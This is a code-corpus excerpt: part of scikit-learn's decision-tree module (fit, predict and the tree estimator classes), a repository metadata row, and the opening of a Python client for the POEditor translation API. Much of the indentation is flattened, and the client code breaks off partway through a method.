self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_features = max_features
self.random_state = random_state
self.max_leaf_nodes = max_leaf_nodes
self.class_weight = class_weight
self.n_features_ = None
self.n_outputs_ = None
self.classes_ = None
self.n_classes_ = None
self.tree_ = None
self.max_features_ = None
def fit(self, X, y, sample_weight=None, check_input=True):
"""Build a decision tree from the training set (X, y).
Parameters
----------
X : array-like or sparse matrix, shape = [n_samples, n_features]
The training input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csc_matrix``.
y : array-like, shape = [n_samples] or [n_samples, n_outputs]
The target values (class labels in classification, real numbers in
regression). In the regression case, use ``dtype=np.float64`` and
``order='C'`` for maximum efficiency.
sample_weight : array-like, shape = [n_samples] or None
Sample weights. If None, then samples are equally weighted. Splits
that would create child nodes with net zero or negative weight are
ignored while searching for a split in each node. In the case of
classification, splits are also ignored if they would result in any
single class carrying a negative weight in either child node.
check_input : boolean, (default=True)
            Allows bypassing several input checks.
            Don't use this parameter unless you know what you are doing.
Returns
-------
self : object
Returns self.
"""
random_state = check_random_state(self.random_state)
if check_input:
X = check_array(X, dtype=DTYPE, accept_sparse="csc")
if issparse(X):
X.sort_indices()
if X.indices.dtype != np.intc or X.indptr.dtype != np.intc:
raise ValueError("No support for np.int64 index based "
"sparse matrices")
# Determine output settings
n_samples, self.n_features_ = X.shape
is_classification = isinstance(self, ClassifierMixin)
y = np.atleast_1d(y)
expanded_class_weight = None
if y.ndim == 1:
            # reshape is necessary to preserve data contiguity;
            # [:, np.newaxis] does not preserve it
y = np.reshape(y, (-1, 1))
self.n_outputs_ = y.shape[1]
if is_classification:
y = np.copy(y)
self.classes_ = []
self.n_classes_ = []
if self.class_weight is not None:
y_original = np.copy(y)
for k in range(self.n_outputs_):
classes_k, y[:, k] = np.unique(y[:, k], return_inverse=True)
self.classes_.append(classes_k)
self.n_classes_.append(classes_k.shape[0])
if self.class_weight is not None:
if isinstance(self.class_weight, six.string_types):
if self.class_weight != "auto":
raise ValueError('The only supported preset for '
'class_weight is "auto". Given "%s".'
% self.class_weight)
elif self.n_outputs_ > 1:
if not hasattr(self.class_weight, "__iter__"):
raise ValueError('For multi-output, class_weight '
'should be a list of dicts, or '
'"auto".')
elif len(self.class_weight) != self.n_outputs_:
raise ValueError("For multi-output, number of "
"elements in class_weight should "
"match number of outputs.")
expanded_class_weight = []
for k in range(self.n_outputs_):
if self.n_outputs_ == 1 or self.class_weight == 'auto':
class_weight_k = self.class_weight
else:
class_weight_k = self.class_weight[k]
weight_k = compute_class_weight(class_weight_k,
self.classes_[k],
y_original[:, k])
weight_k = weight_k[np.searchsorted(self.classes_[k],
y_original[:, k])]
expanded_class_weight.append(weight_k)
expanded_class_weight = np.prod(expanded_class_weight,
axis=0,
dtype=np.float64)
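                # For multi-output problems the per-output weights multiply: a
                # sample weighted 2.0 and 0.5 in two outputs gets weight 1.0.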
else:
self.classes_ = [None] * self.n_outputs_
self.n_classes_ = [1] * self.n_outputs_
self.n_classes_ = np.array(self.n_classes_, dtype=np.intp)
if getattr(y, "dtype", None) != DOUBLE or not y.flags.contiguous:
y = np.ascontiguousarray(y, dtype=DOUBLE)
# Check parameters
max_depth = ((2 ** 31) - 1 if self.max_depth is None
else self.max_depth)
max_leaf_nodes = (-1 if self.max_leaf_nodes is None
else self.max_leaf_nodes)
if isinstance(self.max_features, six.string_types):
if self.max_features == "auto":
if is_classification:
max_features = max(1, int(np.sqrt(self.n_features_)))
else:
max_features = self.n_features_
elif self.max_features == "sqrt":
max_features = max(1, int(np.sqrt(self.n_features_)))
elif self.max_features == "log2":
max_features = max(1, int(np.log2(self.n_features_)))
else:
raise ValueError(
'Invalid value for max_features. Allowed string '
'values are "auto", "sqrt" or "log2".')
elif self.max_features is None:
max_features = self.n_features_
elif isinstance(self.max_features, (numbers.Integral, np.integer)):
max_features = self.max_features
else: # float
if self.max_features > 0.0:
max_features = max(1, int(self.max_features * self.n_features_))
else:
max_features = 0
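        # Examples: with n_features_ = 100, "sqrt" considers 10 features per
        # split, "log2" considers 6, and a float of 0.3 considers 30.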
self.max_features_ = max_features
if len(y) != n_samples:
raise ValueError("Number of labels=%d does not match "
"number of samples=%d" % (len(y), n_samples))
if self.min_samples_split <= 0:
raise ValueError("min_samples_split must be greater than zero.")
if self.min_samples_leaf <= 0:
raise ValueError("min_samples_leaf must be greater than zero.")
        if not 0 <= self.min_weight_fraction_leaf <= 0.5:
            raise ValueError("min_weight_fraction_leaf must be in [0, 0.5]")
        if max_depth <= 0:
            raise ValueError("max_depth must be greater than zero.")
if not (0 < max_features <= self.n_features_):
raise ValueError("max_features must be in (0, n_features]")
if not isinstance(max_leaf_nodes, (numbers.Integral, np.integer)):
            raise ValueError("max_leaf_nodes must be an integral number but "
                             "was %r" % max_leaf_nodes)
if -1 < max_leaf_nodes < 2:
raise ValueError(("max_leaf_nodes {0} must be either smaller than "
"0 or larger than 1").format(max_leaf_nodes))
if sample_weight is not None:
if (getattr(sample_weight, "dtype", None) != DOUBLE or
not sample_weight.flags.contiguous):
sample_weight = np.ascontiguousarray(
sample_weight, dtype=DOUBLE)
if len(sample_weight.shape) > 1:
raise ValueError("Sample weights array has more "
"than one dimension: %d" %
len(sample_weight.shape))
if len(sample_weight) != n_samples:
raise ValueError("Number of weights=%d does not match "
"number of samples=%d" %
(len(sample_weight), n_samples))
if expanded_class_weight is not None:
if sample_weight is not None:
sample_weight = sample_weight * expanded_class_weight
else:
sample_weight = expanded_class_weight
# Set min_weight_leaf from min_weight_fraction_leaf
if self.min_weight_fraction_leaf != 0. and sample_weight is not None:
min_weight_leaf = (self.min_weight_fraction_leaf *
np.sum(sample_weight))
else:
min_weight_leaf = 0.
        # Ensure min_samples_split is large enough to honor min_samples_leaf
min_samples_split = max(self.min_samples_split,
2 * self.min_samples_leaf)
# Build tree
criterion = self.criterion
if not isinstance(criterion, Criterion):
if is_classification:
criterion = CRITERIA_CLF[self.criterion](self.n_outputs_,
self.n_classes_)
else:
criterion = CRITERIA_REG[self.criterion](self.n_outputs_)
SPLITTERS = SPARSE_SPLITTERS if issparse(X) else DENSE_SPLITTERS
splitter = self.splitter
if not isinstance(self.splitter, Splitter):
splitter = SPLITTERS[self.splitter](criterion,
self.max_features_,
self.min_samples_leaf,
min_weight_leaf,
random_state)
self.tree_ = Tree(self.n_features_, self.n_classes_, self.n_outputs_)
# Use BestFirst if max_leaf_nodes given; use DepthFirst otherwise
if max_leaf_nodes < 0:
builder = DepthFirstTreeBuilder(splitter, min_samples_split,
self.min_samples_leaf,
min_weight_leaf,
max_depth)
else:
builder = BestFirstTreeBuilder(splitter, min_samples_split,
self.min_samples_leaf,
min_weight_leaf,
max_depth,
max_leaf_nodes)
builder.build(self.tree_, X, y, sample_weight)
if self.n_outputs_ == 1:
self.n_classes_ = self.n_classes_[0]
self.classes_ = self.classes_[0]
return self
def predict(self, X):
"""Predict class or regression value for X.
For a classification model, the predicted class for each sample in X is
returned. For a regression model, the predicted value based on X is
returned.
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
Returns
-------
y : array of shape = [n_samples] or [n_samples, n_outputs]
            The predicted classes, or the predicted values.
"""
X = check_array(X, dtype=DTYPE, accept_sparse="csr")
if issparse(X) and (X.indices.dtype != np.intc or
X.indptr.dtype != np.intc):
raise ValueError("No support for np.int64 index based "
"sparse matrices")
n_samples, n_features = X.shape
if self.tree_ is None:
            raise NotFittedError("Tree not initialized. Perform a fit first.")
        if self.n_features_ != n_features:
            raise ValueError("Number of features of the model must "
                             "match the input. Model n_features is %s and "
                             "input n_features is %s."
                             % (self.n_features_, n_features))
proba = self.tree_.predict(X)
# Classification
if isinstance(self, ClassifierMixin):
if self.n_outputs_ == 1:
return self.classes_.take(np.argmax(proba, axis=1), axis=0)
else:
predictions = np.zeros((n_samples, self.n_outputs_))
for k in range(self.n_outputs_):
predictions[:, k] = self.classes_[k].take(
np.argmax(proba[:, k], axis=1),
axis=0)
return predictions
# Regression
else:
if self.n_outputs_ == 1:
return proba[:, 0]
else:
return proba[:, :, 0]
@property
def feature_importances_(self):
"""Return the feature importances.
The importance of a feature is computed as the (normalized) total
reduction of the criterion brought by that feature.
It is also known as the Gini importance.
Returns
-------
feature_importances_ : array, shape = [n_features]
"""
if self.tree_ is None:
raise NotFittedError("Estimator not fitted, call `fit` before"
" `feature_importances_`.")
return self.tree_.compute_feature_importances()
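
# ---------------------------------------------------------------------------
# Illustrative usage sketch (not part of the original module; assumes
# scikit-learn is installed): exercises the fit/predict/feature_importances_
# machinery defined above. Guarded so importing this module never runs it.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    import numpy as np
    from sklearn.tree import DecisionTreeClassifier

    rng = np.random.RandomState(0)
    X_demo = rng.rand(100, 4)
    # The label depends only on the first feature, so that feature's
    # importance should dominate in the fitted tree.
    y_demo = (X_demo[:, 0] > 0.5).astype(int)
    clf = DecisionTreeClassifier(max_depth=3, random_state=0).fit(X_demo, y_demo)
    print(clf.predict(X_demo[:5]))
    print(clf.feature_importances_)  # normalized importances, summing to 1.0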
# =============================================================================
# Public estimators
# =============================================================================
class DecisionTreeClassifier(BaseDecisionTree, ClassifierMixin):
"""A decision tree classifier.
Parameters
----------
criterion : string, optional (default="gini")
The function to measure the quality of a split. Supported criteria are
"gini" for the Gini impurity and "entropy" for the information gain.
splitter : string, optional (default="best")
The strategy used to choose the split at each node. Supported
strategies are "best" to choose the best split and "random" to choose
the best random split.
max_features : int, float, string or None, optional (default=None)
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a percentage and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=sqrt(n_features)`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
        Note: the search for a split does not stop until at least one
        valid partition of the node samples is found, even if it requires
        effectively inspecting more than ``max_features`` features.
max_depth : int or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
Ignored if ``max_leaf_nodes`` is not None.
min_samples_split : int, optional (default=2)
The minimum number of samples required to split an internal node.
min_samples_leaf : int, optional (default=1)
The minimum number of samples required to be at a leaf node.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the input samples required to be at a
leaf node.
max_leaf_nodes : int or None, optional (default=None)
Grow a tree with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
If not None then ``max_depth`` will be ignored.
class_weight : dict, list of dicts, "auto" or None, optional
(default=None)
Weights associated with classes in the form ``{class_label: weight}``.
If not given, all classes are supposed to have weight one. For
multi-output problems, a list of dicts can be provided in the same
order as the columns of y.
The "auto" mode uses the values of y to automatically adjust
weights inversely proportional to class frequencies in the input data.
For multi-output, the weights of each column of y will be multiplied.
Note that these weights will be multiplied with sample_weight (passed
through the fit method) if sample_weight is specified.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Attributes
----------
tree_ : Tree object
The underlying Tree object.
max_features_ : int,
        The inferred value of max_features.
classes_ : array of shape = [n_classes] or a list of such arrays
The classes labels (single output problem),
or a list of arrays of class labels (multi-output problem).
n_classes_ : int or list
The number of classes (for single output problems),
or a list containing the number of classes for each
output (for multi-output problems).
feature_importances_ : array of shape = [n_features]
The feature importances. The higher, the more important the
feature. The importance of a feature is computed as the (normalized)
total reduction of the criterion brought by that feature. It is also
known as the Gini importance [4]_.
See also
--------
DecisionTreeRegressor
References
----------
.. [1] http://en.wikipedia.org/wiki/Decision_tree_learning
.. [2] L. Breiman, J. Friedman, R. Olshen, and C. Stone, "Classification
and Regression Trees", Wadsworth, Belmont, CA, 1984.
.. [3] T. Hastie, R. Tibshirani and J. Friedman. "Elements of Statistical
Learning", Springer, 2009.
.. [4] L. Breiman, and A. Cutler, "Random Forests",
http://www.stat.berkeley.edu/~breiman/RandomForests/cc_home.htm
Examples
--------
>>> from sklearn.datasets import load_iris
>>> from sklearn.cross_validation import cross_val_score
>>> from sklearn.tree import DecisionTreeClassifier
>>> clf = DecisionTreeClassifier(random_state=0)
>>> iris = load_iris()
>>> cross_val_score(clf, iris.data, iris.target, cv=10)
... # doctest: +SKIP
...
array([ 1. , 0.93..., 0.86..., 0.93..., 0.93...,
0.93..., 0.93..., 1. , 0.93..., 1. ])
"""
def __init__(self,
criterion="gini",
splitter="best",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features=None,
random_state=None,
max_leaf_nodes=None,
class_weight=None):
super(DecisionTreeClassifier, self).__init__(
criterion=criterion,
splitter=splitter,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_features=max_features,
max_leaf_nodes=max_leaf_nodes,
class_weight=class_weight,
random_state=random_state)
def predict_proba(self, X):
"""Predict class probabilities of the input samples X.
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
Returns
-------
p : array of shape = [n_samples, n_classes], or a list of n_outputs
such arrays if n_outputs > 1.
The class probabilities of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
"""
check_is_fitted(self, 'n_outputs_')
X = check_array(X, dtype=DTYPE, accept_sparse="csr")
if issparse(X) and (X.indices.dtype != np.intc or
X.indptr.dtype != np.intc):
raise ValueError("No support for np.int64 index based "
"sparse matrices")
n_samples, n_features = X.shape
if self.tree_ is None:
raise NotFittedError("Tree not initialized. Perform a fit first.")
if self.n_features_ != n_features:
            raise ValueError("Number of features of the model must "
                             "match the input. Model n_features is %s and "
                             "input n_features is %s."
                             % (self.n_features_, n_features))
proba = self.tree_.predict(X)
if self.n_outputs_ == 1:
proba = proba[:, :self.n_classes_]
normalizer = proba.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
proba /= normalizer
return proba
else:
all_proba = []
for k in range(self.n_outputs_):
proba_k = proba[:, k, :self.n_classes_[k]]
normalizer = proba_k.sum(axis=1)[:, np.newaxis]
normalizer[normalizer == 0.0] = 1.0
proba_k /= normalizer
all_proba.append(proba_k)
return all_proba
def predict_log_proba(self, X):
"""Predict class log-probabilities of the input samples X.
Parameters
----------
X : array-like or sparse matrix of shape = [n_samples, n_features]
The input samples. Internally, it will be converted to
``dtype=np.float32`` and if a sparse matrix is provided
to a sparse ``csr_matrix``.
Returns
-------
p : array of shape = [n_samples, n_classes], or a list of n_outputs
such arrays if n_outputs > 1.
The class log-probabilities of the input samples. The order of the
classes corresponds to that in the attribute `classes_`.
"""
proba = self.predict_proba(X)
if self.n_outputs_ == 1:
return np.log(proba)
else:
for k in range(self.n_outputs_):
proba[k] = np.log(proba[k])
return proba
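
# Illustrative sketch (not part of the original module): for a single output,
# predict_proba returns one [n_samples, n_classes] array; for multi-output
# problems it returns a list with one such array per output, as documented
# above. Guarded so importing this module never runs it.
if __name__ == "__main__":
    import numpy as np
    from sklearn.tree import DecisionTreeClassifier

    X_mo = np.array([[0.0], [1.0], [2.0], [3.0]])
    Y_mo = np.array([[0, 1], [0, 1], [1, 0], [1, 0]])  # two outputs per sample
    proba = DecisionTreeClassifier(random_state=0).fit(X_mo, Y_mo).predict_proba(X_mo)
    print(len(proba))       # 2: one probability array per output
    print(proba[0].shape)   # (4, 2): n_samples x n_classes for output 0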
class DecisionTreeRegressor(BaseDecisionTree, RegressorMixin):
"""A decision tree regressor.
Parameters
----------
criterion : string, optional (default="mse")
The function to measure the quality of a split. The only supported
criterion is "mse" for the mean squared error.
splitter : string, optional (default="best")
The strategy used to choose the split at each node. Supported
strategies are "best" to choose the best split and "random" to choose
the best random split.
max_features : int, float, string or None, optional (default=None)
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a percentage and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=n_features`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
        Note: the search for a split does not stop until at least one
        valid partition of the node samples is found, even if it requires
        effectively inspecting more than ``max_features`` features.
max_depth : int or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
Ignored if ``max_leaf_nodes`` is not None.
min_samples_split : int, optional (default=2)
The minimum number of samples required to split an internal node.
min_samples_leaf : int, optional (default=1)
The minimum number of samples required to be at a leaf node.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the input samples required to be at a
leaf node.
max_leaf_nodes : int or None, optional (default=None)
Grow a tree with ``max_leaf_nodes`` in best-first fashion.
Best nodes are defined as relative reduction in impurity.
If None then unlimited number of leaf nodes.
If not None then ``max_depth`` will be ignored.
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
Attributes
----------
tree_ : Tree object
The underlying Tree object.
max_features_ : int,
        The inferred value of max_features.
feature_importances_ : array of shape = [n_features]
The feature importances.
The higher, the more important the feature.
The importance of a feature is computed as the
(normalized) total reduction of the criterion brought
by that feature. It is also known as the Gini importance [4]_.
See also
--------
DecisionTreeClassifier
References
----------
.. [1] http://en.wikipedia.org/wiki/Decision_tree_learning
.. [2] L. Breiman, J. Friedman, R. Olshen, and C. Stone, "Classification
and Regression Trees", Wadsworth, Belmont, CA, 1984.
.. [3] T. Hastie, R. Tibshirani and J. Friedman. "Elements of Statistical
Learning", Springer, 2009.
.. [4] L. Breiman, and A. Cutler, "Random Forests",
http://www.stat.berkeley.edu/~breiman/RandomForests/cc_home.htm
Examples
--------
>>> from sklearn.datasets import load_boston
>>> from sklearn.cross_validation import cross_val_score
>>> from sklearn.tree import DecisionTreeRegressor
>>> boston = load_boston()
>>> regressor = DecisionTreeRegressor(random_state=0)
>>> cross_val_score(regressor, boston.data, boston.target, cv=10)
... # doctest: +SKIP
...
array([ 0.61..., 0.57..., -0.34..., 0.41..., 0.75...,
0.07..., 0.29..., 0.33..., -1.42..., -1.77...])
"""
def __init__(self,
criterion="mse",
splitter="best",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features=None,
random_state=None,
max_leaf_nodes=None):
super(DecisionTreeRegressor, self).__init__(
criterion=criterion,
splitter=splitter,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_features=max_features,
max_leaf_nodes=max_leaf_nodes,
random_state=random_state)
class ExtraTreeClassifier(DecisionTreeClassifier):
"""An extremely randomized tree classifier.
Extra-trees differ from classic decision trees in the way they are built.
When looking for the best split to separate the samples of a node into two
groups, random splits are drawn for each of the `max_features` randomly
selected features and the best split among those is chosen. When
    `max_features` is set to 1, this amounts to building a totally random
decision tree.
Warning: Extra-trees should only be used within ensemble methods.
See also
--------
ExtraTreeRegressor, ExtraTreesClassifier, ExtraTreesRegressor
References
----------
.. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
Machine Learning, 63(1), 3-42, 2006.
"""
def __init__(self,
criterion="gini",
splitter="random",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features="auto",
random_state=None,
max_leaf_nodes=None,
class_weight=None):
super(ExtraTreeClassifier, self).__init__(
criterion=criterion,
splitter=splitter,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_features=max_features,
max_leaf_nodes=max_leaf_nodes,
class_weight=class_weight,
random_state=random_state)
class ExtraTreeRegressor(DecisionTreeRegressor):
"""An extremely randomized tree regressor.
Extra-trees differ from classic decision trees in the way they are built.
When looking for the best split to separate the samples of a node into two
groups, random splits are drawn for each of the `max_features` randomly
selected features and the best split among those is chosen. When
    `max_features` is set to 1, this amounts to building a totally random
decision tree.
Warning: Extra-trees should only be used within ensemble methods.
See also
--------
ExtraTreeClassifier, ExtraTreesClassifier, ExtraTreesRegressor
References
----------
.. [1] P. Geurts, D. Ernst., and L. Wehenkel, "Extremely randomized trees",
Machine Learning, 63(1), 3-42, 2006.
"""
def __init__(self,
criterion="mse",
splitter="random",
max_depth=None,
min_samples_split=2,
min_samples_leaf=1,
min_weight_fraction_leaf=0.,
max_features="auto",
random_state=None,
max_leaf_nodes=None):
super(ExtraTreeRegressor, self).__init__(
criterion=criterion,
splitter=splitter,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
min_weight_fraction_leaf=min_weight_fraction_leaf,
max_features=max_features,
max_leaf_nodes=max_leaf_nodes,
random_state=random_state)
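
# Illustrative sketch (not part of the original module): per the warnings
# above, the ExtraTree* estimators are intended as building blocks for
# ensembles such as ExtraTreesClassifier rather than for standalone use.
# Guarded so importing this module never runs it.
if __name__ == "__main__":
    from sklearn.datasets import load_iris
    from sklearn.ensemble import ExtraTreesClassifier

    iris = load_iris()
    forest = ExtraTreesClassifier(n_estimators=30, random_state=0)
    print(forest.fit(iris.data, iris.target).score(iris.data, iris.target))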
|
maheshakya/scikit-learn
|
sklearn/tree/tree.py
|
Python
|
bsd-3-clause
| 34,714
|
[
"Brian"
] |
6ab1424dd0e6516e49feb124ae0aedb456ad932897a056351e339f6c8d9326b7
|
"""
Client Interface for POEditor API (https://poeditor.com).
Usage:
>>> from poeditor import POEditorAPI
>>> client = POEditorAPI(api_token='my_token')
>>> projects = client.list_projects()
"""
import json
import requests
import sys
import tempfile
import warnings
from datetime import datetime
__all__ = ['POEditorException', 'POEditorArgsException', 'POEditorAPI']
if sys.version_info < (3, 2):
from datetime import timedelta
def parse_datetime(dt_string):
        # Hacky and not really equivalent to the Python 3.2 version, but good
        # enough for most use cases; this avoids adding an extra dependency
        # such as dateutil or iso8601.
ret = datetime.strptime(dt_string[:19], '%Y-%m-%dT%H:%M:%S')
if dt_string[19] == '+':
ret -= timedelta(hours=int(dt_string[20:22]), minutes=int(dt_string[22:]))
elif dt_string[19] == '-':
ret += timedelta(hours=int(dt_string[20:22]), minutes=int(dt_string[22:]))
return ret
else:
# https://docs.python.org/3/whatsnew/3.2.html#datetime-and-time
def parse_datetime(dt_string):
return datetime.strptime(dt_string, '%Y-%m-%dT%H:%M:%S%z')
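
# Illustrative sketch (editor's example, not part of the original client):
# both branches above accept ISO 8601 timestamps with a numeric UTC offset.
# On Python < 3.2 the result is a naive datetime already shifted to UTC; on
# newer versions it is offset-aware. Guarded so importing never runs it.
if __name__ == "__main__":
    print(parse_datetime('2016-03-01T12:00:00+0200'))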
class POEditorException(Exception):
"""
POEditor API exception
"""
def __init__(self, error_code, status, message):
self.exp = 'POEditorException'
self.error_code = error_code
self.message = "Status '{}', code {}: {}".format(
status, error_code, message)
super(POEditorException, self).__init__()
def __str__(self):
return self.message
class POEditorArgsException(Exception):
"""
POEditor args method exception
"""
def __init__(self, message):
self.exp = 'POEditorArgsException'
self.message = message
super(POEditorArgsException, self).__init__()
class POEditorAPI(object):
"""
Connect your software to POEditor with its simple API
    Please refer to https://poeditor.com/docs/api if you have questions.
"""
HOST = "https://api.poeditor.com/v2/"
SUCCESS_CODE = "success"
FILE_TYPES = ['po', 'pot', 'mo', 'xls', 'csv', 'resx', 'resw', 'android_strings',
'apple_strings', 'xliff', 'properties', 'key_value_json', 'json',
'xmb', 'xtb']
FILTER_BY = ['translated', 'untranslated', 'fuzzy', 'not_fuzzy',
'automatic', 'not_automatic', 'proofread', 'not_proofread']
UPDATING_TERMS = 'terms'
UPDATING_TERMS_TRANSLATIONS = 'terms_translations'
UPDATING_TRANSLATIONS = 'translations'
    # in seconds; uploads are limited to one request every 30 seconds
MIN_UPLOAD_INTERVAL = 30
def __init__(self, api_token):
"""
All requests to the API must contain the parameter api_token.
You'll find it in My Account > API Access in your POEditor account.
"""
self.api_token = api_token
def _construct_url(self, path):
return '{}{}'.format(self.HOST, path)
def _make_request(self, url, payload, headers=None):
kwargs = {}
if payload.get('file'):
kwargs['files'] = {'file': payload.pop('file')}
response = requests.post(url, data=payload, headers=headers, **kwargs)
if response.status_code != 200:
raise POEditorException(
status='fail',
error_code=response.status_code,
message=response.reason
)
data = response.json()
if 'response' not in data:
raise POEditorException(
status='fail',
error_code=-1,
message='"response" key is not present'
)
if 'status' in data['response'] and \
data['response']['status'] != self.SUCCESS_CODE:
raise POEditorException(
error_code=data['response'].get('code'),
status=data['response']['status'],
message=data['response'].get('message')
)
return data
def _run(self, url_path, headers=None, **kwargs):
"""
Requests API
"""
url = self._construct_url(url_path)
payload = kwargs
payload.update({'api_token': self.api_token})
return self._make_request(url, payload, headers)
def _apiv1_run(self, action, headers=None, **kwargs):
"""
Kept for backwards compatibility of this client
See "self.clear_reference_language"
"""
warnings.warn(
"POEditor API v1 is deprecated. Use POEditorAPI._run method to call API v2",
DeprecationWarning, stacklevel=2
)
url = "https://poeditor.com/api/"
payload = kwargs
payload.update({'action': action, 'api_token': self.api_token})
return self._make_request(url, payload, headers)
def _project_formatter(self, data):
"""
Project object
"""
        open_ = bool(data['open']) and data['open'] != '0'
        public = bool(data['public']) and data['public'] != '0'
output = {
'created': parse_datetime(data['created']),
'id': int(data['id']),
'name': data['name'],
'open': open_,
'public': public,
}
# the detail view returns more info than the list view
# see https://poeditor.com/docs/api#projects_view
for key in ['description', 'reference_language', 'terms']:
if key in data:
output[key] = data[key]
return output
def list_projects(self):
"""
Returns the list of projects owned by user.
"""
data = self._run(
url_path="projects/list"
)
projects = data['result'].get('projects', [])
return [self._project_formatter(item) for item in projects]
def create_project(self, name, description=None):
"""
        Creates a new project. Returns the id of the project (if successful).
"""
description = description or ''
data = self._run(
url_path="projects/add",
name=name,
description=description
)
return data['result']['project']['id']
def update_project(self, project_id, name=None, description=None,
reference_language=None):
"""
Updates project settings (name, description, reference language)
If optional parameters are not sent, their respective fields are not updated.
"""
kwargs = {}
if name is not None:
kwargs['name'] = name
if description is not None:
kwargs['description'] = description
if reference_language is not None:
kwargs['reference_language'] = reference_language
data = self._run(
url_path="projects/update",
id=project_id,
**kwargs
)
return data['result']['project']['id']
def delete_project(self, project_id):
"""
Deletes the project from the account.
You must be the owner of the project.
"""
self._run(
url_path="projects/delete",
id=project_id,
)
return True
def view_project_details(self, project_id):
"""
Returns project's details.
"""
data = self._run(
url_path="projects/view",
id=project_id
)
return self._project_formatter(data['result']['project'])
def list_project_languages(self, project_id):
"""
Returns project languages, percentage of translation done for each and the
datetime (UTC - ISO 8601) when the last change was made.
"""
data = self._run(
url_path="languages/list",
id=project_id
)
return data['result'].get('languages', [])
def add_language_to_project(self, project_id, language_code):
"""
Adds a new language to project
"""
self._run(
url_path="languages/add",
id=project_id,
language=language_code
)
return True
def delete_language_from_project(self, project_id, language_code):
"""
Deletes existing language from project
"""
self._run(
url_path="languages/delete",
id=project_id,
language=language_code
)
return True
def set_reference_language(self, project_id, language_code):
"""
Sets a reference language to project
"""
return self.update_project(project_id, reference_language=language_code)
def clear_reference_language(self, project_id):
"""
Clears reference language from project
Could not find how to reproduce the "clear_reference_language" v1 action with the v2 API.
Calling v2 projects/update with reference_language='' or reference_language=None did not work.
https://poeditor.com/docs/api#projects_update
"""
self._apiv1_run(
action="clear_reference_language",
id=project_id
)
return True
def view_project_terms(self, project_id, language_code=None):
"""
Returns project's terms and translations if the argument language is provided.
"""
data = self._run(
url_path="terms/list",
id=project_id,
language=language_code
)
return data['result'].get('terms', [])
def add_terms(self, project_id, data):
"""
Adds terms to project.
>>> data = [
{
"term": "Add new list",
"context": "",
"reference": "\/projects",
"plural": "",
"comment": ""
},
{
"term": "one project found",
"context": "",
"reference": "\/projects",
"plural": "%d projects found",
"comment": "Make sure you translate the plural forms",
"tags": [
"first_tag",
"second_tag"
]
},
{
"term": "Show all projects",
"context": "",
"reference": "\/projects",
"plural": "",
"tags": "just_a_tag"
}
]
"""
data = self._run(
url_path="terms/add",
id=project_id,
data=json.dumps(data)
)
return data['result']['terms']
def update_terms(self, project_id, data, fuzzy_trigger=None):
"""
Updates project terms. Lets you change the text, context, reference, plural and tags.
>>> data = [
{
"term": "Add new list",
"context": "",
"new_term": "Save list",
"new_context": "",
"reference": "\/projects",
"plural": "",
"comment": "",
"tags": [
"first_tag",
"second_tag"
]
},
{
"term": "Display list",
"context": "",
"new_term": "Show list",
"new_context": ""
}
]
"""
kwargs = {}
if fuzzy_trigger is not None:
kwargs['fuzzy_trigger'] = fuzzy_trigger
data = self._run(
url_path="terms/update",
id=project_id,
data=json.dumps(data),
**kwargs
)
return data['result']['terms']
def delete_terms(self, project_id, data):
"""
Deletes terms from project.
>>> data = [
{
"term": "one project found",
"context": ""
},
{
"term": "Show all projects",
"context": "form"
}
]
"""
data = self._run(
url_path="terms/delete",
id=project_id,
data=json.dumps(data)
)
return data['result']['terms']
def add_comment(self, project_id, data):
"""
Adds comments to existing terms.
>>> data = [
{
"term": "Add new list",
"context": "",
"comment": "This is a button"
},
{
"term": "one project found",
"context": "",
"comment": "Make sure you translate the plural forms"
},
{
"term": "Show all projects",
"context": "",
"comment": "This is a button"
}
]
"""
data = self._run(
url_path="terms/add_comment",
id=project_id,
data=json.dumps(data)
)
